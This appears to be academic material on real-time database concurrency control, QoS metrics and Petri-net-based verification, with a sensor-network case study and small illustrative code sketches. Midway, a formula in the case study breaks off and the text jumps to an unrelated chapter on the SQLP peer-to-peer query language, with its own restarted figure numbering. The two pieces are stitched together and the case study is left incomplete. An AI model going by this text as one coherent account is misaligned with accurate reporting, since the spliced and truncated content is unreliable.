Concurrency Control The negotiation between logical and temporal consistency, a concurrency-control technique should be capable of using knowledge about the application to determine which transactions can be executed concurrently. Such a technique, named semantic concurrency control, allows increasing the concurrent execution of transactions (method invocation). Based on the knowledge of the application the designer must define which transactions may be concurrently executed and when. Defining compatibilities between the executions of the transactions does this. Therefore, this technique allows relaxing the ACID properties. Transactions in real-time do not need to be serialized, especially updated transactions that record information from the environment. However, the consequence of relaxing serialization is that some imprecision can be accumulated in the database, and in the vision of the database. An object-oriented semantic concurrency control technique, described in DiPippo (1995), named semantic-lock technique, allows logical and temporal consistency of the data and transactions and allows the negotiation among them. The technique also allows the control of the imprecision resulting from the negotiation. The concurrency control is distributed among the objects, and a compatibility function, says CF for short, is defined for each pair of methods for database objects. CF is defined as follows: CF(mati ,minv) = Boolean Expression → IA
where mati represents the method that is being executed and minv represents the method that was invoked. The Boolean Expression can be defined based on predicates involving the values of the arguments of the methods, the database attributes, and the system in general. IA is defined by an expression that evaluates the accumulated imprecision for the attributes of the database object and for the arguments of the methods. The consequence of using such a concurrency control is that more flexible schedules for transactions can be obtained than those allowed by serialization. Besides, the technique can specify and limit the imprecision that may appear in the system due to the relaxation of serialization.
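To illustrate how such a compatibility function might be evaluated at run time, here is a minimal sketch assuming a simple attribute/imprecision representation; the method names, thresholds, and the `compatibility` helper are illustrative assumptions and not the semantic-lock implementation of DiPippo (1995).

```python
# Hypothetical sketch of a semantic-lock style compatibility check.
def compatibility(m_active: str, m_invoked: str, obj: dict):
    """Return (compatible?, imprecision added), mirroring
    CF(m_act, m_inv) = Boolean Expression -> IA: the Boolean expression
    inspects attribute values and accumulated imprecision, and IA estimates
    the imprecision the concurrent execution would introduce."""
    if m_active == "update_temperature" and m_invoked == "read_temperature":
        # Allow a read concurrently with an update only while the
        # accumulated imprecision stays under the object's limit.
        added = abs(obj["pending_value"] - obj["value"])
        compatible = obj["imprecision"] + added <= obj["imprecision_limit"]
        return compatible, added if compatible else 0.0
    # Default: fall back to exclusive (serialized) execution.
    return False, 0.0

# Example use inside an object's local concurrency controller:
obj = {"value": 21.5, "pending_value": 21.9, "imprecision": 0.2, "imprecision_limit": 1.0}
ok, ia = compatibility("update_temperature", "read_temperature", obj)
print(ok, ia)  # True 0.4 (approximately)
```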
Quality of Service (QoS) Management

In a real-time database, QoS management can help to verify both the correctness and the performance of a system through functions and performance metrics. This is necessary, since real-time transactions have temporal constraints; therefore, we consider transactions correct only if they finish within their deadlines using valid data. The functions defined are the functions of specification, mapping, negotiation, and monitoring. The specification function defines which QoS parameters are available and determines their syntax and semantics. The mapping function has to be provided to translate the QoS requirements expressed. The role of a QoS negotiation mechanism is to determine an agreement on the required values of the QoS parameters between the system and the users or applications. A QoS negotiation protocol is executed every time a new user or application joins an active session, to verify whether the system has enough resources to accept the new user or application request without compromising the current performance. This function usually employs several QoS mechanisms to fulfill its task; for example, admission control is used to determine whether a new user can be served, while resource reservation has to be called as soon as the user is admitted, in order to guarantee the requested service quality. The negotiation function has the role of the compatibility function described above. We define two performance metrics to guarantee the RTDB performance. These metrics are defined as follows:

1.	Number of transactions that miss their deadline in relation to the amount of transactions that finish successfully (Pt): This metric sets the rate of missed transaction deadlines that can be allowed during a time interval. The metric is defined as:

	Pt = MissedDeadline / FinishTransactions

	where Pt is the amount of transactions that miss the deadline (MissedDeadline) in relation to the amount of transactions that finish with success (FinishTransactions).

2.	Upper imprecision of data (Impr): This is the threshold of imprecision admitted in a data item for it to be considered logically valid. Impr is defined as:

	Impr = CurrentValue × (Imp / 100)

	where CurrentValue is the value of the data item stored in the database and Imp is the index of the amount of imprecision admitted.
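As a rough illustration of how these two metrics could be computed (an assumption-laden sketch, not part of the original method), treating Imp as a percentage index:

```python
# Illustrative computation of the two QoS metrics described above.
def miss_ratio(missed_deadline: int, finished_transactions: int) -> float:
    """Pt = MissedDeadline / FinishTransactions."""
    if finished_transactions == 0:
        return 0.0
    return missed_deadline / finished_transactions

def upper_imprecision(current_value: float, imp_percent: float) -> float:
    """Impr = CurrentValue * (Imp / 100), assuming Imp is a percentage index."""
    return current_value * (imp_percent / 100.0)

# A data item stays logically valid while its accumulated imprecision
# remains within upper_imprecision(current_value, imp_percent).
print(miss_ratio(3, 100))          # 0.03 -> 3% missed relative to successful transactions
print(upper_imprecision(21.5, 2))  # 0.43 units of admissible imprecision
```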
HCPN-Based Modeling

Hierarchical Coloured Petri Nets

Hierarchical coloured Petri nets (HCPNs) are an extension of coloured Petri nets (CPNs) (Jensen, 1998) and are a suitable modeling language for verifying systems, as they can express concurrency, parallelism, nondeterminism, and different levels of abstraction. Figure 2 illustrates a Petri net in which hierarchical levels are allowed.

Figure 2. Coloured Petri net (a substitution transition with its input/output ports and sockets, and fusion places linking a superpage and a subpage)

These hierarchical levels are possible due to the inclusion of two mechanisms: substitution transitions and fusion places. A substitution transition is a transition that will be replaced by a CPN page. The page to which the substitution transition belongs is called a superpage, and the page represented by the transition is called a subpage. The association between subpages and superpages is performed by means of sockets and ports. Sockets are all the input and output places of the transition in the superpage. Ports are the places in the subpage associated with the sockets. The ports can be input, output, or input-output. For simulation and state-space generation, sockets and ports are glued together and the resulting model is a flat CPN model. The fusion places are physically different but logically a single place, forming a fusion set. Therefore, all the places belonging to a fusion set always have the same marking. A marking of a place is the set of tokens in that place at a given moment. The marking of a net is the set of markings of all places in the net at a given moment (Jensen, 1998). Indeed, these two additional mechanisms, substitution transitions and fusion places, are purely graphical, helping in the organization and visualization of a CPN model. They favor the modeling of larger and more complex systems by giving the designer the ability to model by abstraction, specialization, or both.
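As a rough illustration of markings and fusion sets (hypothetical, not from the article): places can be represented as multisets of tokens, and all members of a fusion set can share one multiset so that they always carry the same marking.

```python
from collections import Counter

# Markings as multisets of tokens; the places in a fusion set share one
# Counter, so they always have the same marking, as described above.
fusion_marking = Counter({"sensor_reading": 2})

places = {
    "P_buffer_page1": fusion_marking,   # member of the fusion set (superpage)
    "P_buffer_page2": fusion_marking,   # same logical place on another page
    "P_ready": Counter({"txn": 1}),     # an ordinary place with its own marking
}

# The marking of the net is the set of markings of all places at this moment.
net_marking = {name: dict(m) for name, m in places.items()}
print(net_marking)
```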
Design/CPN Tools

Design/CPN (Jensen et al., 1999) is a tool package supporting the use of HCPNs. The Design/CPN tool has four integrated parts:

1.	The CPN editor supports construction, modification, and syntax checking of CPN models.
2.	The CPN simulator supports interactive and automatic simulation of CPN models.
3.	The occurrence graph tool supports construction and analysis of occurrence graphs for CPN models (also known as state spaces or reachability graphs/trees).
4.	The performance tool supports simulation-based performance analysis of CPN models.

The Design/CPN package is one of the most used Petri net tools. Design/CPN supports CPN models with complex data types (colour sets) and complex data manipulations (arc expressions and guards), both specified in the functional programming language Standard ML (Jensen et al., 1999).
REAL-TIME DATABASE VERIFICATION AND VALIDATION METHOD

The formal verification and validation method for real-time database systems consists of the application of the following steps, as illustrated in Figure 3, which are detailed in this section:

1.	Build an object model: It is used to specify the requirements and identify the main components of the system. It is also used to model static properties of objects, such as attributes, operations, and logical and timing constraints. In any case, the object model defines the universe of discourse for the process model.
2.	Build a process model: It is used to model both functional and dynamic properties of objects. The functional properties define the object operations, while the dynamic properties represent the temporal interactions of objects and their responses to events. The process model is composed of the operations identified in the object model.
3.	Generate an occurrence graph: It is a representation of the state space of the HCPN model.
4.	Generate a message sequence chart: Message sequence charts are generated for each scenario, considering a possible execution sequence.
5.	Generate a timing diagram: It is a diagram that shows the timing constraints over a time sample.

Figure 3. Real-time database verification and validation method
Build an Object Model

In the object model, each object is a unique entity. Objects with the same data structure (attributes) and behavior (operations), in the context of the particular application environment, are grouped into an object class. Classes can be grouped in a hierarchical structure. Classes may have attributes; the attributes are structural properties of classes that can have both logical and temporal constraints; the relationships are the links between the classes; the operations are functions or procedures applicable to the class attributes; and a method is the implementation of an operation (Rumbaugh, Blaha, Premerlani, Eddy, & Lorensen, 1991). The object model consists of a set of class diagrams, object diagrams, and a data dictionary. The class diagrams show the general description of the system, while the object diagrams show object instances. The data dictionary defines all the entities modeled (classes, associations, attributes, operations). The object model begins with the analysis of the problem statement and has the following steps:

1.	Identification of the objects: The external actors and objects that interact with the system are identified as the problem context. Elements of the object model that emerge from the analysis of the real problem are directly mapped into logical objects. Each instance of an object is assumed to be unique. The objects in an object class have a unique identity that separates and identifies them from all other object instances.
2.	Identification of relationships among objects: A conceptual relationship among instances of classes. Associations have cardinality, including one-to-one, one-to-many, and many-to-many. Most object-oriented texts do not address the nature of an association (i.e., mandatory or optional), except in the definition of the object behavior.
3.	Addition of attributes to objects: A data value that can be held by the objects in a class. Attributes may be assigned to different data types (e.g., integer).
4.	Use of generalizations to observe similarities and differences: The essential characteristics of an object or class are abstracted, ignoring irrelevant features and providing crisply defined conceptual boundaries. This maintains a focus on identifying common characteristics among what may initially appear to be different objects. Abstraction enhances reusability and inheritance.
5.	Identification of operations: The direct manipulation of an object, categorized as: constructor (create an object and/or initialize it), destructor (free the state of an object and/or destroy the object), modifier (alter the state of the object), selector (access and read the state of an object), and iterator (access all parts of an object in a well-defined order).
6.	Identification of concurrent operations: In this step, the designer analyzes the system to discover which operations need to be executed concurrently and under which conditions this occurs. Then, the function that details the situations in which the operations can be executed concurrently is defined.
7.	Identification of both logical and temporal constraints: The designer must declare both logical and temporal constraints on objects. These constraints define the correct states of each object. Thus, the constraints are defined as predicates that include attribute values, time, and so on. For instance, the absolute validity interval defined for real-time data, in the Background section, expresses a temporal constraint on data objects (a sketch of such a predicate follows this list).
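As an illustration of such a constraint expressed as a predicate (a hypothetical sketch using attribute names that also appear later in the case study), a data object can be declared temporally valid only while the age of its last update stays within its absolute validity interval:

```python
import time

# Hypothetical temporal-constraint predicate: a data object is valid only
# while the age of its last update stays within its absolute validity interval.
def temporally_valid(item, now=None):
    now = time.time() if now is None else now
    return (now - item["timestamp"]) <= item["avi"]

reading = {"value": 21.5, "avi": 10.0, "timestamp": time.time() - 4.0, "sensor": "BDSensor_RT1"}
print(temporally_valid(reading))  # True: the reading is 4 seconds old, avi is 10 seconds
```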
Build a Process Model

The process model captures both functional and dynamic properties of objects. This model is used in the analysis, design, and implementation phases of the software-development life cycle. These phases can be tackled concurrently using hierarchical coloured Petri nets. HCPNs are used to analyze the system behavior. In this model, the objects are described through HCPN modules (or pages) that are defined from the object model. Then, for each object that contains operations identified in the model, an HCPN module is created in which the corresponding operations are modeled. We use the Design/CPN tool package (Jensen et al., 1999) for HCPN modeling. For that, the following steps must be performed:

1.	Identification of the objects in HCPN: In this step, all of the objects in the object model are identified, and for each identified object an HCPN module is constructed.
2.	Identification of functions for each object: The operations that must be executed by each object are identified. What each object must execute is analyzed without considering its implementation.
3.	Definition of the interface for each object: The interface of each object is declared, indicating the methods with their respective input and output arguments, the constraints defined for the classes, and the functions that describe the compatibility between methods.
4.	Definition of the internal structure of each object: The methods detailed in the interface of the objects are described, satisfying the requirements identified in the object-identification phase.
Occurrence Graph (OG)

The occurrence graph tool is closely integrated with the Design/CPN tool package (Jensen et al., 1999). The basic idea behind occurrence graphs is to build a directed graph with a node for each reachable marking and an arc for each occurring binding element. An arc connects the node of the marking in which the associated binding element occurs to the node of the marking resulting from its occurrence (Jensen, 1998). The OG has a large number of built-in standard queries, such as Reachable, which determines whether there is an occurrence sequence between two specified markings, and AllReachable, which determines whether all the reachable markings are reachable from each other. These queries can be used to investigate all the standard properties of an HCPN. In addition to the standard queries, there are a number of powerful search facilities that allow formulating nonstandard queries. The standard queries require no programming at all; the nonstandard queries usually require two to five lines of quite straightforward ML code. Through an occurrence graph, it is possible to verify the properties inherent to the model. The occurrence graph tool allows obtaining reports with general properties of the model. These reports contain information about the graph and meta-properties that are useful for understanding the behavior of the HCPN model. For instance: boundedness properties, which supply the upper and lower limits of tokens that each net place can contain, besides the marking limits for each place; and liveness properties, which show the markings and transitions that are dead (do not precede any other marking) and the transitions that are live (appear in some occurrence sequence starting from the initial marking of the net). Occurrence graphs can be constructed with or without considering time or code segments. When an occurrence graph has been constructed using Design/CPN, it can be analyzed in different ways. The easiest approach is to use the Save Report command to generate a standard
report providing information about all standard CPN properties:

•	Statistics: Size of occurrence graph
•	Boundedness properties: Integer and multiset bounds for place instances
•	Home properties: Home markings
•	Liveness properties: Dead markings, dead/live transition instances
•	Fairness properties: Impartial/fair/just transition instances
To use the OG tool, the user simply enters the simulator and invokes the Enter Occ Graph command (in the file menu of Design/CPN). This has a similar effect to Enter Simulator: it creates the occurrence graph code, that is, the ML code necessary to calculate, analyze, and draw occurrence graphs. Moreover, it creates a new menu, called Occ, which contains all the commands that are used to perform the calculation and drawing of occurrence graphs.
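Standard queries such as Reachable amount to simple searches over the occurrence graph. The following is a schematic Python illustration of that idea over a hand-written, hypothetical graph; it is not the ML code or the internal representation used by Design/CPN.

```python
from collections import deque

# Minimal sketch of a Reachable-style query over an occurrence graph:
# nodes are markings, edges are occurrences of binding elements.
def reachable(graph: dict, source, target) -> bool:
    seen, queue = {source}, deque([source])
    while queue:
        node = queue.popleft()
        if node == target:
            return True
        for succ in graph.get(node, ()):
            if succ not in seen:
                seen.add(succ)
                queue.append(succ)
    return False

occ_graph = {"M0": ["M1", "M2"], "M1": ["M3"], "M2": ["M3"], "M3": []}
print(reachable(occ_graph, "M0", "M3"))  # True
```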
Generate a Message Sequence Chart (MSC)

MSC is a graphical and textual language for the description and specification of the interactions between system components. Message sequence charts may be used for requirements specification, simulation and validation, test-case specification, and documentation of real-time systems. As illustrated in Figure 4, the MSC comprises the QoS functions, the transactions with their operations, and the RTDB. In this method, the use of MSCs is essential, since it makes it possible to verify the properties of the real-time database by representing the transaction properties and data properties, both with temporal constraints. It is also possible to validate the behavior of the objects, their relationships, and the situations in which concurrent access to the RTDB occurs through the object operations. To generate the MSC, we use the "smc.sml" library of the Design/CPN tool package.
Generate a Timing Diagram (TD)

The timing diagram is generated by the Design/CPN performance tool, which facilitates simulation-based performance analysis of HCPNs. In this context, performance analysis is based on the analysis of data extracted from an HCPN model during simulation. The performance tool provides random number generators for a variety of probability distributions and high-level support both for data collection and for generating simulation output.
Figure 4. Description of the message sequence chart (timelines for the transactions, the negotiation function, the database, and the QoS functions of specification/mapping and mapping/monitoring, exchanging Begin, Negotiation, and Finish messages over time)
The random number generators can be used to create more accurate models by modeling certain probability-distribution aspects of a system, while the data collection facilities can extract relevant data from a CPN model. Before data can be collected from an HCPN model, it is necessary to generate the performance code, that is, the ML code that is used to extract data from the HCPN model. The Design/CPN performance tool can then be used to generate performance reports such as a timing diagram.
Case Study: Real-Time Database for Sensor Networks

Case Study Overview

A sensor network is considered as the application domain for the case study, where the proposed method is applied. For this case study, a scenario is described in which the monitored environment must maintain a steady temperature. The upper and lower bounds for the temperature are defined. Sensors are placed in the environment with the objective of acquiring and storing the temperature values. Periodically, the data stored in the sensors are sent to a real-time database server through sensor transactions. The data obtained have temporal validity and the transactions have deadlines. The server is updated in order to allow historical queries. The architecture of the case study is illustrated in Figure 5.

Figure 5. Architecture of the sensor network case study (sensors BDSensor_RT1 and BDSensor_RT2 with data items X:(value, avi, timestamp, sensor), the BDWarehousing server with items X:(Tp, Qtde, Avi, Tsp, Imp, Milr), negotiation functions, transactions management, a clock for real-time constraints, and the operator's console; methods AT, CTL or CTI, and CTH connect the controlled and controlling systems)

Applying the Proposed Method

Building the Object Model

According to the steps defined to obtain the object model, we have:

1.	Identification of the objects: The objects identified in the model are the sensors BDSensor_RT1 and BDSensor_RT2, and the real-time database server, called BDWarehousing.
2.	Identification of relationships among objects: The sensors send data to the server through transactions. Each sensor updates the server, while the server is updated by various sensors.
3.	Addition of attributes to objects: The data item X acquired by a sensor is composed of the following attributes: value is the content of the data item; avi is the absolute validity interval; timestamp is the last update time; and sensor identifies which sensor acquired the data. The data item stored in the real-time database server has the fields: Tp, which is the data item processed; Qtde, which is the value that will be updated in the server; Avi, which is the absolute validity interval; Tsp, which is the last update time; sensor, which identifies the sensor that acquired the data; Imp, which is the accumulated imprecision; and Milr, which is the limit of Imp.
4.	Use of generalization to observe similarities and differences: This step is unnecessary for this model, due to the existence of only two objects.
5.	Identification of operations: The sensors aim at acquiring data from the external environment (method AT), and these data can be read by long and snapshot queries (method CTL and method CTI, respectively). Long queries are performed over a time interval, and snapshot queries are performed at an absolute time. The real-time database server holds the historical data obtained by the sensors (method AT) and allows one to query this historical data (method CTH).
6.	Identification of concurrent operations: The BDSensor_RT1 and BDSensor_RT2 objects have two negotiation functions that
Figure 6. Object model

BDSensor_RT1 and BDSensor_RT2 — ATTRIBUTES: X: value * avi * timestamp * sensor (value: integer; avi: time; timestamp (tsp): time; sensor: string). METHODS: AT() Acquire Temperature; CTL() Long Query; CTI() Snapshot Query. NEGOTIATION FUNCTION.

BDWarehousing — ATTRIBUTES: X: Tp * Qtde * Avi * Tsp * Imp * Milr (Tp: characters; Avi: time; Tsp: time; Imp: integer; Milr: integer). METHODS: AT() Acquire Temperature; CTH() Historical Query. NEGOTIATION FUNCTION: (CTI(), AT(NOVO)) = ((now - X.tsp)
VHu(C1) = { v | v ∈ viewpoint(u,T): v ∈ community(C_NAME, u) }

	A radius of a certain number of hops dictates the peers of interest (C1: HOPS θ value, with θ ∈ {=, <, ≤, >, ≥}):

	VHu(C1) = { v | v ∈ viewpoint(u,T): distance(u,v) θ value, with θ ∈ {=, <, ≤, >, ≥} }

	A set of peer ids, that is, a set of specifically requested peers, determines the peers of interest (C1: PEERS = {peer1, peer2, …, peern}):

	VHu(C1) = { v | v ∈ viewpoint(u,T): v ∈ {peer1, peer2, …, peern} }

	All the necessary information for the evaluation of any of the aforementioned atomic conditions is found in the system catalog of u.
•	Quality of service: The clauses concerning the AVAILABILITY and RESPONSE TIME of the peers of interest aim to guarantee a certain level of quality of service for the peer posing the query.
•	CLASS: It is possible that we only need to query the peers of a certain class. Classes carry both structural typing information (as they statically define the interface of their instances) and semantic information (as collections of semantically, and therefore structurally, similar instances). In SQLP, it is easy to specify an atomic condition that restricts the peers of interest to a certain class by giving a condition of the form C4: CLASS = class_name. Assuming that VCu(C4) is the resulting set of peers of interest and class(v) is a function that returns the class of each peer from the system catalog of the querying peer, the resulting set of peers of interest is formally defined as:

	VCu(C4) = { v | v ∈ viewpoint(u,T): class(v) = class_name }
•	AGE: Apart from constraining peers whose properties are taken as criteria for their inclusion in the resulting set of peers of interest, we can perform some form of caching over the extents of the collected tuples for virtual or hybrid relations. In other words, assuming that a peer is frequently queried, it is not obligatory to pay the price of invoking its Web service operations, executing the data transformation workflow, and materializing the same results again and again; rather, it is resource efficient to cache its previous results. The AGE clause of SQLP provides the possibility of specifying a maximum caching age for incoming tuples in a virtual/hybrid relation.
•	Query timing: Having clarified the general mechanism for the determination of the peers of interest, we move on to provide the specification for the timing of queries. Fundamentally, we have two modes of operation: ad hoc or continuous. Each mode has its own tuning parameters:
	•	If the query is continuous, the user is continuously notified on the status of the query result.
	•	If the query is ad hoc, the query eventually has to terminate. Differently from traditional query processing (which operates on finite sets of always available, locally stored tuples), we need to tune the conditions that signify termination of a query that has been late to complete its operation, either due to peer failures or due to the size of the peer graph. To capture these exceptions, we can terminate a query upon (a) the completion of a timeout period of execution, (b) the materialization of a certain amount of tuples that the user judges as satisfactory for his information, or (c) the collection of responses from a certain percentage of the peers that were initially contacted. In all these cases, the execution of the
workflows whose results have not been materialized is interrupted, the rest of the query is executed as usual, and the user is presented with a partial (still non-empty) answer.
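Putting the peer-selection clauses together, the following hypothetical sketch evaluates HORIZON (hops), AVAILABILITY, RESPONSE_TIME, and CLASS conditions over a local catalog; the field names and thresholds are assumptions for illustration only.

```python
# Hypothetical evaluation of the peers-of-interest conditions over a local catalog.
catalog = [
    {"id": "p2", "hops": 1, "availability": 0.75, "response_time": 2.1, "class": "european"},
    {"id": "p3", "hops": 3, "availability": 0.55, "response_time": 5.0, "class": "european"},
    {"id": "p4", "hops": 6, "availability": 0.90, "response_time": 1.2, "class": "american"},
]

def peers_of_interest(catalog, max_hops, min_avail, max_rt, class_name):
    """Intersection of the HORIZON, AVAILABILITY, RESPONSE_TIME, and CLASS conditions."""
    return [
        p["id"] for p in catalog
        if p["hops"] <= max_hops
        and p["availability"] > min_avail
        and p["response_time"] < max_rt
        and p["class"] == class_name
    ]

print(peers_of_interest(catalog, max_hops=5, min_avail=0.6, max_rt=4.0, class_name="european"))
# ['p2']
```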
Query Execution

At this point, we can describe the exact set of steps for executing a query. Suppose that at a random time T, a query Q is performed by node u. Let {R1, R2, …, Rn} be the relations involved in query Q. Then the query can be written in the form Q(R1, R2, …, Rn). We can assume, without loss of generality, that the relations R1, R2, …, Rk, with k ≤ n, are virtual or hybrid. All tables R1, R2, …, Rk must be filled with tuples. The procedure is the same for all tables; therefore, we present it only for table R1. The first step is to determine the set of target peers for node u that performs the query (Vu(C)), by evaluating C over the set of peers belonging to the viewpoint of u (viewpoint(u)). C comprises the conditions located in the clauses AGE, HORIZON, AVAILABILITY, RESPONSE_TIME, and CLASS. Let Vu(C) = {u1, u2, …, um}. For each node of Vu(C), the appropriate Web services are invoked in order to request the appropriate tuples. Let also wfu.R1(u1), wfu.R1(u2), …, wfu.R1(um) be the appropriate workflows of the peers belonging to Vu(C). The schema of each workflow is matched to the schema of relation R1, which is the target relation. In the following, the clause TIMING is evaluated to determine the execution mode of the query (continuous or ad hoc) and the completion condition of the query. The next step is to attempt the execution of wfu.R1(ui) and then perform a full or partial materialization of R1, which is located in u, according to the query completion condition mentioned before. Table R1 is populated with the appropriate tuples and is ready to be queried. The same procedure is performed for all other virtual or hybrid tables. Therefore, all tables
of u are ready to be queried. At this point, the query of u is performed over tables R1, R2, …, Rn based on traditional database methodology.
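The population step for a virtual or hybrid relation can be summarized as the following control-flow sketch; `invoke_workflow` and `done` are hypothetical placeholders for the Web service workflow execution and the TIMING completion condition, respectively, and this is not the actual SQLP engine.

```python
def populate_relation(peers_of_interest, invoke_workflow, done):
    """Populate one virtual/hybrid relation from the peers of interest.

    invoke_workflow(peer) runs the peer's Web service workflow and returns
    tuples already matched to the target relation's schema; done(tuples)
    encodes the TIMING completion condition (timeout, tuple count, or
    percentage of peers answered)."""
    materialized = []
    for peer in peers_of_interest:
        if done(materialized):
            break
        try:
            materialized.extend(invoke_workflow(peer))
        except ConnectionError:
            continue  # a failing peer only reduces the answer; it does not abort the query
    return materialized  # the relation is now local and is queried as usual
```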
Examples

In the rest of this section, we present examples of SQLP. Assume a peer network with the topology of Figure 5, consisting of 5 peers, each representing a car on the highway. Queries are posed to peer p1, which classifies the rest of the peers into two communities: (a) the community of dark-shaded close peers (Distance_Under_5km) and (b) the community of light-shaded, distant peers (Distance_Over_5km). Peer p1 is informed of the existence and connectivity of the rest of the peers through the underlying routing protocol, which operates as a black box in our setting. Peer p1 carries a database consisting of two relations with the following schemata:

CARS(ID, PLATE, BRAND, VEL)
BRANDS(BRAND, COUNTRY, METRIC_SYSTEM)

The first relation describes the information collected from the peers contacted (and mainly serves queries about the velocity of the cars in the context of the querying peer). This relation, CARS, is virtual: each time a query is posed, tuples must be collected from the context of peer p1 to
populate it. The attribute BRAND is a foreign key to the relation BRANDS that is static and locally stored. Primary keys are underlined and the semantics of the attributes are the obvious ones. In the sequel, we give examples of SQLP queries over the abovementioned environment.
Example 1

By this example, we illustrate different situations in which we can determine the peer nodes to which the query is addressed. Different strategies may be used for choosing the peers to query; in any case, the decision is based on characteristics of the peers such as availability, response time, class of Web services implemented, and so forth. Peer p1 wishes to know the license number, velocity, and manufacturing country of all cars belonging to its community. Furthermore, the peer that poses the query wishes to limit it to those peers that: (a) are located no more than 5 km away (Distance_Under_5km), (b) have an availability of more than 60%, (c) have a response time of less than 4 seconds, and, finally, (d) implement the European class of Web services. The syntax of the examined query is depicted in Figure 6.
Figure 5. Graph configuration for query posing (five peers, numbered 1-5, partitioned into the Distance_Under_5km and Distance_Over_5km communities)

Figure 6. Query 1

SELECT CARS.PLATE, CARS.VEL, BRANDS.COUNTRY
FROM CARS, BRANDS
WHERE CARS.BRAND = BRANDS.BRAND
WITH HORIZON COMMUNITY Distance_Under_5km AND
	AVAILABILITY > 60% AND
	RESPONSE_TIME < 4.0 AND
	CLASS = 'european'

Example 2

Peer p1 wishes to know the license number, velocity, and manufacturing country of all cars. The
peer also wishes to complete the query when more than 70% of the target peers have replied successfully (Figure 7). To determine the target peers, the requesting peer selects peers based on its catalog and according to their response time. The execution of the query stops when the requested percentage (70% in our case) is satisfied.
Example 3

Peer p1 wishes to know the license number, velocity, and manufacturing country of all cars. The peer also wishes to complete the query when more than 5 tuples have been collected for the relation CARS (Figure 8). The requesting peer contacts each peer that appears in its catalog. This procedure ends when the count of currently collected tuples becomes greater than or equal to the posed limit.
Example 4

Peer p1 wishes to know the license number, velocity, and manufacturing country of all cars. The peer also wishes to complete the query within a timeout of 7 seconds (Figure 9). The requesting peer contacts each peer that appears in its catalog. This procedure ends when the timeout is reached.
QUERY PROCESSING FOR SQLP QUERIES

In this section, we deal with the problem of mapping declarative SQLP queries to executable query plans. As already mentioned, the execution of traditional SQL queries relies on their mapping to left-deep trees whose leaves are database relations, whose internal nodes are operators of the relational algebra, and whose edges signify the pipelining of the results of one node to another. Clearly, since we raise fun-
damental assumptions of traditional database querying, such as the finiteness and locality of tuples as well as the conditions under which a query terminates, we need to extend both the set of operators that take part in a query and the way the query tree is constructed. In this section, we start by introducing the novel operators for query processing. Next, we discuss how we algorithmically determine the set of peers of interest and, finally, we discuss the execution of a query.
Novel Operators

In this subsection, we start with the operators that participate in SQLP query plans. We directly adopt the Project, Select, Group, Order, Union, Intersection, Difference, and Join operators from traditional relational algebra and move on to define new operators. First, we discuss operators that are used to construct the set of peers of interest. Then, we present the operators that actually take part in a query plan.

•	Operators applicable to the catalog of a peer:
	•	Check_Tables: The Check_Tables operator determines whether the tables belonging to the FROM clause of a query are virtual, hybrid, or local. The input to the operator is the FROM clause of the query and the output is the same list of tables, each annotated with the category to which it belongs.
	•	Check_Peers: This is a composite operator that applies the procedure mentioned in the second section for the determination of a set of peers out of a condition in disjunctive normal form. All clauses of the form HORIZON, AVAILABILITY, RESPONSE_TIME, and CLASS are evaluated over the catalog through a Check_Peers operator, and the set of peers of interest is determined by combining the results of these operators through the appropriate Unions and Intersections.
	•	Check_Age: The Check_Age operator is also used to determine the set of peers of interest. For each relation that hosts transaction-time and producing-peer attributes, an invocation of the Check_Age operator scans the extent of the relation and identifies the appropriate tuples and their peers. The output is passed to the appropriate Difference operator that subtracts the identified peers from the previously determined set of peers of interest.
•	Operators that participate in query plans:
	•	Call_WS: This operator is responsible for dynamically determining which Web service operation, over which port type, of a specific peer must be invoked. Each Web service of a peer to be invoked is practically wrapped by this operator. The result is collected and forwarded to the operator managing the execution of a workflow of Web services.
	•	Wrapper_Pop: This operator is used to support the monitoring and execution of the workflow of Web services that populate a virtual or hybrid table. For each peer contacted in order to populate a certain virtual/hybrid relation, a Wrapper_Pop operator is introduced. Once the final XML result has been computed, its tuples are transformed to the schema of the target relation.
	•	Fill: A Fill operator is introduced for each virtual relation. The operator takes as input all the results of the underlying Wrapper_Pop operators (one for each peer of interest) and coordinates their materialization. Also, Fill checks the necessary conditions concerning the timing and termination of the query and, whenever termination is required, it signals its populating operators appropriately.
	•	ExAg (Execute Again): This operator is useful only in continuous queries and practically restarts query execution whenever the query period is completed.
Construction of the Query Tree

In this paragraph, we discuss a simple algorithm to generate the tree of the query plan. Assume that a query is posed to peer p1 and that its viewpoint comprises n peers, specifically p1, p2, ..., pn. The algorithm for the construction of the query tree is a bottom-up algorithm that builds the tree from the leaves to the top; it is described as follows (a schematic code sketch of these steps is given after the list):

1.	We discover the virtual or hybrid relations that participate in the query. A specific sub-tree will be constructed for each of them.
2.	We determine the set of peers of interest. For each peer that participates in the population of a certain relation, the leaves of the respective sub-tree are nodes representing the peer to be contacted. To keep the tree-like form of the plan, each peer can be replicated in each sub-tree in which it participates; nevertheless, each peer can also be modeled by a single node without any significant impact on the execution of the query.
3.	We introduce a Wrapper_Pop for each peer, which coordinates all the Call_WS operators that pertain to the operations of the peer. Between the peer node and the Wrapper_Pop, we introduce the appropriate Call_WS operators.
4.	For each virtual or hybrid relation, we introduce a Fill operator that combines the output of all the respective Wrapper_Pop operators; therefore, it is their immediate ancestor.
5.	Having introduced the Fill operators, the virtual or hybrid relations can be materialized and act as local ones. Therefore, the rest of the query tree is built as in traditional query processing.
6.	If the query is continuous, we add an appropriate ExAg operator at the top.
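The following schematic sketch (hypothetical names throughout, including the peers and their operations) assembles a plan tree along the lines of steps 1-6; it is meant only to make the bottom-up construction tangible, not to reproduce the actual optimizer.

```python
# Schematic, hypothetical construction of an SQLP query plan tree.
class Node:
    def __init__(self, label, children=None):
        self.label = label
        self.children = children or []

def build_plan(virtual_relations, peers_of, operations_of, continuous=False):
    """virtual_relations: relation names; peers_of[r]: peers populating r;
    operations_of[p]: Web service operations of peer p."""
    subtrees = []
    for rel in virtual_relations:
        wrappers = []
        for peer in peers_of[rel]:
            calls = [Node(f"Call_WS({peer}.{op})") for op in operations_of[peer]]
            wrappers.append(Node(f"Wrapper_Pop({peer})", calls))
        subtrees.append(Node(f"Fill({rel})", wrappers))
    # The materialized relations now act as local ones; the rest of the
    # plan (joins, selections, projections) is built as usual on top.
    root = Node("TraditionalPlan", subtrees)
    return Node("ExAg", [root]) if continuous else root

plan = build_plan(["CARS"], {"CARS": ["p2", "p8"]},
                  {"p2": ["getSpeed"], "p8": ["getSpeed"]}, continuous=True)
```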
Execution of a Query through the Query Tree

